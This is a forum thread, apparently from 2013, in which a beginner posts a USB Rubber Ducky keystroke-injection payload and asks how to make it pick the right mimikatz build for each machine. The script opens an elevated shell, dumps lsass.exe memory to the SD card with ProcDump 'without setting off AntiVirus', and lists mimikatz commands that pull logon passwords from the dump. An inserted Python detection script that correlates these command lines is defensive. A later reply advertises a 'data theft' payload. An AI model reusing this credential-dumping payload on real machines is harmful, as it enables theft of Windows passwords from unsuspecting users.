Applenuts Posted October 10, 2013

Please someone help?? I am a complete n00b to this stuff, but diving in head first, fast~n~hard. I have successfully compiled and used DK's mimikatz\ProcDump payload. My issue lies in the fact that I have to switch the mimikatz.exe between x86 and x64 manually, depending on the OS. Which implies my inspecting said machine first, then plugging in, swapping files, and so on. Or having separate .bins (SHIFT+payload button or CTRL+payload button, etc.). Is there a way to have one payload using either .exe version from the root dir? If so, could someone please help a n00b out? THaNX iN AdVAnCE

*****************************************************************************
REM Author: Hak5Darren with the help of:
REM @gentilkiwi, @Mubix, redmeatuk, shutin, DyFukA, Microsoft, Sysinternals
REM
REM Description: "Backup" Windows Passwords without setting off AntiVirus
REM Dumps memory of lsass.exe using Microsoft Sysinternals util ProcDump
REM Passwords can be later be extracted using mimikatz.
REM
REM Firmware: Use c_duck_v2.1.hex firmware (Twin Duck) to execute from SD
REM card labeled "DUCKY" and save log file as %COMPUTERNAME%_lsass.dmp
REM Include procdump.exe on root of DUCKY SD card. Download ProcDump from:
REM http://technet.microsoft.com/en-us/sysinternals/dd996900.aspx
REM
REM Target: Windows Vista/7/8, Win32/x64
REM *** UAC Bypass ***
DELAY 2000
WINDOWS r
DELAY 200
STRING powershell Start-Process cmd.exe -Verb runAs
ENTER
DELAY 2000
ALT y
DELAY 500
REM *** Define DUCKY drive as %duck%
STRING for /f %d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set duck=%d
ENTER
DELAY 500
REM *** Execute procdump from SD card and save log file to disk ***
STRING %duck%\procdump.exe -accepteula -ma lsass.exe %duck%\%COMPUTERNAME%_lsass.dmp
ENTER
REM *** GTFO ***
STRING exit
ENTER
REM *** Post Exploitation ***
REM From your PC copy the %COMPUTERNAME%_lsass.dmp off the DUCKY SD card to a
REM directory including the version of mimikatz for your targets architecture
REM (NT5 win32, NT5 x64, NT6 win32 or NT6 x64) and run the following commands
REM mimikatz.exe <enter>
REM sekurlsa::minidump %COMPUTERNAME%_lsass.dmp <enter>
REM sekurlsa::logonPasswords full <enter>
*****************************************************************************
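
Seen from the defending side, the script in the post above leaves three distinctive process-creation command lines on a host. The following is an added example, not part of the thread: a Python triage that correlates them per host. Field names follow Sysmon Event ID 1; the sample records, host names, rule names and severity levels are constructed assumptions.

```python
import re
from collections import defaultdict

# Constructed process-creation records (Sysmon Event ID 1 style fields); not real logs.
SAMPLE_EVENTS = [
    {"Computer": "WS-014", "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell Start-Process cmd.exe -Verb runAs"},
    {"Computer": "WS-014", "Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "CommandLine": "wmic volume get driveletter, label"},
    {"Computer": "WS-014", "Image": r"E:\procdump.exe",
     "CommandLine": r"E:\procdump.exe -accepteula -ma lsass.exe E:\WS-014_lsass.dmp"},
    {"Computer": "WS-022", "Image": r"C:\Tools\procdump.exe",  # benign dump of another process
     "CommandLine": r"C:\Tools\procdump.exe -ma w3wp.exe C:\dumps\w3wp.dmp"},
]

# Rule names are hypothetical labels; each pattern mirrors one step of the posted script.
RULES = {
    "elevated_cmd_via_powershell": re.compile(r"start-process\s+cmd(\.exe)?\s.*-verb\s+runas", re.I),
    "volume_label_lookup": re.compile(r"wmic\s+volume\s+get\s.*label", re.I),
    # Keyed on arguments, not the image name, so a renamed ProcDump still matches.
    "lsass_full_dump": re.compile(r"(?=.*\s[-/]ma\b)(?=.*\blsass(\.exe)?\b)", re.I),
}

def off_system_drive(image, system_drive="C:"):
    """True when the executable path is not on the system drive (e.g. removable media)."""
    return not image.upper().startswith(system_drive.upper())

def triage(events):
    """Return {host: {"hits": set, "severity": str}} for every host with a rule hit."""
    hits = defaultdict(set)
    for ev in events:
        for name, rx in RULES.items():
            if rx.search(ev["CommandLine"]):
                hits[ev["Computer"]].add(name)
                if name == "lsass_full_dump" and off_system_drive(ev["Image"]):
                    hits[ev["Computer"]].add("dumper_off_system_drive")
    report = {}
    for host, names in hits.items():
        if "lsass_full_dump" not in names:
            severity = "low"          # precursor steps only
        else:                         # dump seen; corroborating steps raise confidence
            severity = "critical" if len(names) >= 3 else "high"
        report[host] = {"hits": names, "severity": severity}
    return report

if __name__ == "__main__":
    for host, result in triage(SAMPLE_EVENTS).items():
        print(host, result["severity"], sorted(result["hits"]))
```

Command-line matching only sees a dump requested by process name; a dump requested by PID needs process-access telemetry on lsass.exe (Sysmon Event ID 10) instead.
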

Applenuts (Author) Posted October 12, 2013

* ^ * Note~ I am trying to add something from the Ducky Tool Kit Payload Generator to the above code.

UnKn0wnBooof Posted October 25, 2013

Maybe you should take a look at my Ducky payload. It's called "ULTIMATE DATA THEIF!!". It should definitely answer your question.